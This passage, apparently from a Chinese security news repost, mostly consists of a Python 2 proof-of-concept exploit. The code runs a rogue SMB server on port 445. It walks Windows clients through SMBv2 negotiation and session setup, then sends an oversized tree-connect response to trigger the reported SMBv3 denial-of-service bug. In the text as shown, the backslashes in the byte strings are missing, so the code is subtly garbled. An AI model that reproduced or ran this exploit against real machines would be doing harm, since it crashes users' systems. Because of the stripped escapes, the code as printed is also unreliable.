              print "From:", self.client_address
              data = self.request.recv(1024)

             ##Negotiate proto answer.
              if data[8:10] == "x72x00" and data[4:5] == "xff":
                head = SMBv2Header(CreditCharge="x00x00",Credits="x01x00",PID="x00x00x00x00")
                t = SMB2NegoAns()
                t.calculate()
                packet1 = str(head)+str(t)
                buffer1 = longueur(packet1)+packet1  
                print "[*]Negotiating SMBv2."
                self.request.send(buffer1)
                data = self.request.recv(1024)

              if data[16:18] == "x00x00":
                CreditsRequested = data[18:20]
                if CreditsRequested == "x00x00":
                   CreditsRequested =  "x01x00"
                CreditCharged = data[10:12]
                head = SMBv2Header(MessageId=GrabMessageID(data), PID="xffxfex00x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
                t = SMB2NegoAns(Dialect="x02x02")
                t.calculate()
                packet1 = str(head)+str(t)
                buffer1 = longueur(packet1)+packet1  
                print "[*]Negotiate Protocol SMBv2 packet sent."
                self.request.send(buffer1)
                data = self.request.recv(1024)

              #Session More Work to Do
              if data[16:18] == "x01x00":
                head = SMBv2Header(Cmd="x01x00", MessageId=GrabMessageID(data), PID="xffxfex00x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID="x4dx00x00x00x00x04x00x00",NTStatus="x16x00x00xc0")
                t = SMB2Session1Data()
                t.calculate()
                packet1 = str(head)+str(t)
                buffer1 = longueur(packet1)+packet1
                print "[*]Session challenge SMBv2 packet sent."
                self.request.send(buffer1)
                data = self.request.recv(1024)

              #Session Positive
              if data[16:18] == "x01x00" and GrabMessageID(data)[0:1] == "x02":
                head = SMBv2Header(Cmd="x01x00", MessageId=GrabMessageID(data), PID="xffxfex00x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="x00x00x00x00", SessionID=GrabSessionID(data))
                t = SMB2SessionAcceptData()
                t.calculate()
                packet1 = str(head)+str(t)
                buffer1 = longueur(packet1)+packet1
                self.request.send(buffer1)
                data = self.request.recv(1024)

              ## Tree Connect
              if data[16:18] == "x03x00":
                head = SMBv2Header(Cmd="x03x00", MessageId=GrabMessageID(data), PID="xffxfex00x00", TID="x01x00x00x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="x00x00x00x00", SessionID=GrabSessionID(data))
                t = SMB2TreeData(Data="C"*1500)#//BUG
                packet1 = str(head)+str(t)
                buffer1 = longueur(packet1)+packet1
                print "[*]Triggering Bug; Tree Connect SMBv2 packet sent."
                self.request.send(buffer1)
                data = self.request.recv(1024)

        except Exception:
           print "Disconnected from", self.client_address
           pass

SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),SMB2)
launch.serve_forever()

 

本文标题:Windows SMBv3 协议曝 0day,可导致拒绝服务攻击危害用户系统
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2017/0203_543.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » Windows SMBv3 协议曝 0day,可导致拒绝服务攻击危害用户系统
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们